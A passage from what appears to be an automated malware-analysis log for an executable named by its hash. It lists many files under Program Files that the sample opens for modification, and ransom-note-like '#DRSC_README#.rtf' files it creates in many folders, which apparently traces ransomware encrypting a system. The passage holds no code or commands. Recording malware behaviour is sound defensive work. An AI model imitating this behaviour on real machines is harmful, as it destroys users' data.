Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\Etc\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Marengo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mazatlan 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\server\Xusage.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\youtube.crx 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Salta 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\ResourceInternal.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\ktab.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\keytool.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\resources.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Regina 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\fontconfig.properties.src 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\AUTHORS.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfxrt.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-8 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Montevideo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Mail\en-US\msoeres.dll.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\images\cursors\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Thule 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\pt-PT.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl.bat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Amman 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-8 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Adak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\ConnectBlock.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director_2.3.100.v20140224-1921.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Anchorage 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-compat.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mexico_City 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\javacpl.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\LINEAR_RGB.pf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Adelaide 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.identity_3.4.0.v20140827-1444.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Abidjan 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Campo_Grande 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Samara 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Tallinn 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\preloaded_data.pb 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Cape_Verde 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmiregistry.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Mail\WinMail.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\CodeFile.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\larrow.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Apia 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-utilities.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\America\Kentucky\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tehran 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\DisconnectSync.dwg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme_0.9.300.v20140424-2042.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guayaquil 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\javaw.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\en-GB.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Caracas 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Paris 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome.exe.sig 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Simferopol 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Kiev 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_it.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\about.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guyana 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\currency.data 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yakutsk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search5.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Noronha 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ro.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Miquelon 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\jvm.hprof.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\San_Luis 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\removed-files 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\drive.crx 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sv.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\conticon.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-tools.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\VideoLAN Website.url 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Mawson 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore_2.10.1.v20140901-1043.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Pyongyang 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guyana 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Godthab 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32Info.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Update\1.3.35.452\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Volgograd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Fiji 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\soundcloud.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\GMT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Troll 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\Welcome.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kwajalein 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification 